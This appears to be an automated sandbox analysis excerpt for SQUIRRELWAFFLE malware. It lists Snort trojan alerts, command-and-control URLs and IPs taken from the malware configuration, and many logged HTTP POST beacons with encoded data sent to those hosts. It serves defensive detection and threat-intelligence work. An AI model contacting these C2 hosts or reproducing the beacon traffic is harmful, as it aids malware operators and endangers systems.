                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49821
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49821
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49822
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49822
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49824
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49824
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49826
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49826
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49828
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49828
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49830
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49830
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49832
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49832
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49834
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49834
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49836
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49836
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49837
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49837
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49839
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 107.180.44.125:80 -> 192.168.2.7:49839
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49842
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49842
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49844
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49844
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49847
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49847
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49850
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49850
                  Source: TrafficSnort IDS: 2033984 ET TROJAN Possible SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49852
                  Source: TrafficSnort IDS: 2033982 ET TROJAN SQUIRRELWAFFLE Server Response 103.28.36.212:80 -> 192.168.2.7:49852
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: acdlimited.com/2u6aW9Pfe
                  Source: Malware configuration extractorURLs: jornaldasoficinas.com/ZF8GKIGVDupL
                  Source: Malware configuration extractorURLs: orldofjain.com/lMsTA7tSYpe
                  Source: Malware configuration extractorURLs: altayaralsudani.net/SSUsPgb7PHgC
                  Source: Malware configuration extractorURLs: hoteloaktree.com/QthLWsZsVgb
                  Source: Malware configuration extractorURLs: aterwellnessinc.com/U7D0sswwp
                  Source: Malware configuration extractorURLs: sirifinco.com/Urbhq9wO50j
                  Source: Malware configuration extractorURLs: ordpress17.com/5WG6Z62sKWo
                  Source: Malware configuration extractorURLs: mohsinkhanfoundation.com/pcQLeLMbur
                  Source: Malware configuration extractorURLs: lendbiz.vn/xj3BhHtMbf
                  Source: Malware configuration extractorURLs: geosever.rs/ObHP1CHt
                  Source: Malware configuration extractorURLs: nuevainfotech.com/xCNyTjzkoe
                  Source: Malware configuration extractorURLs: dadabhoy.pk/m6rQE94U
                  Source: Malware configuration extractorURLs: 111
                  Source: Malware configuration extractorURLs: sjgrand.lk/zvMYuQqEZj
                  Source: Malware configuration extractorURLs: erogholding.com/GFM1QcCFk
                  Source: Malware configuration extractorURLs: armordetailing.rs/lgfrZb4Re6WO
                  Source: Malware configuration extractorURLs: lefrenchwineclub.com/eRUGdDox
                  Source: Malware configuration extractorURLs: http://23.82.140.206/jquery-3.3.1.slim.min.js
                  Source: Malware configuration extractorURLs: tuxsecuritybiness.com
                  Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                  Source: Joe Sandbox ViewASN Name: HOSTPRO-ASUA HOSTPRO-ASUA
                  Source: global trafficHTTP traffic detected: POST /QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw= HTTP/1.1Host: hoteloaktree.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /Urbhq9wO50j/ASk5Kx0SPR8lJjE5eTg9GkN6dX1le310YXlkfA== HTTP/1.1Host: sirifinco.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /Urbhq9wO50j/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkfA== HTTP/1.1Host: sirifinco.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/eDkkAA0bInx9RnpzeWJ+fXJlfmF8 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/HDN9NScAAw8PKwEFMi0/JTI5PEZ6c3lifn1yZX5hfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/CAsZDz1/MEJ9dnlkenp3ZXhlew== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/DClzfTsJDgA/AicrERgXCHsERX5yeGV9eXNkeWJ4 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/EgwECwQhMhk+BQkuH38nHQUtIy4GLwpFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/GB0tLyckQ3p1fWV7fXRheWR8 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/EgwSFkZ6c3lifn1yZX5hfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/CXwgNgIIIXMeeQkPPhYCOUN6dX1le310YXlkfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/fSkCegETcg8VKw95Qn12eWR6endleGV7 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/ITIYRX5yeGV9eXNkeWJ4 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/OhpCfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/DCwZNSYnBRJFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/MyYYFB8/BgEuIANyGHgkPAMsGDcYQ3p1fWV7fXRheWR8 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/egl7fAgEMAQAAkJ7cn5henxzYn1lfQ== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/KQsyKkZ6c3lifn1yZX5hfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/Hh8fPwgIJRkuIzgrOjp5HjovOkZ6c3lifn1yZX5hfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/AjlCfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/OSdCfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/HiYFeTpyPng4KCF4Pzk8EQgqOQkgOA0PBUJ7cn5henxzYn1lfQ== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/JhANAzl6Gw8FBhMABRYGcn9CfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/DRs5e3gJAw4gNkJ7cn5henxzYn1lfQ== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/P34KJnkbASUWPzEYIgcWQntyfmF6fHNifWV9 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/ES1CfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/GAUAID5zCzE+BzoOJAtGenN5Yn59cmV+YXw= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/fxgDNT4yEngregozMnp+J0N6dX1le310YXlkfA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/DxMffwwOHXMHeXJDenV9ZXt9dGF5ZHw= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                  Source: global trafficHTTP traffic detected: POST /pcQLeLMbur/ICYbCzstHxl+BhF4Jg5+GH0FRX5yeGV9eXNkeWJ4 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
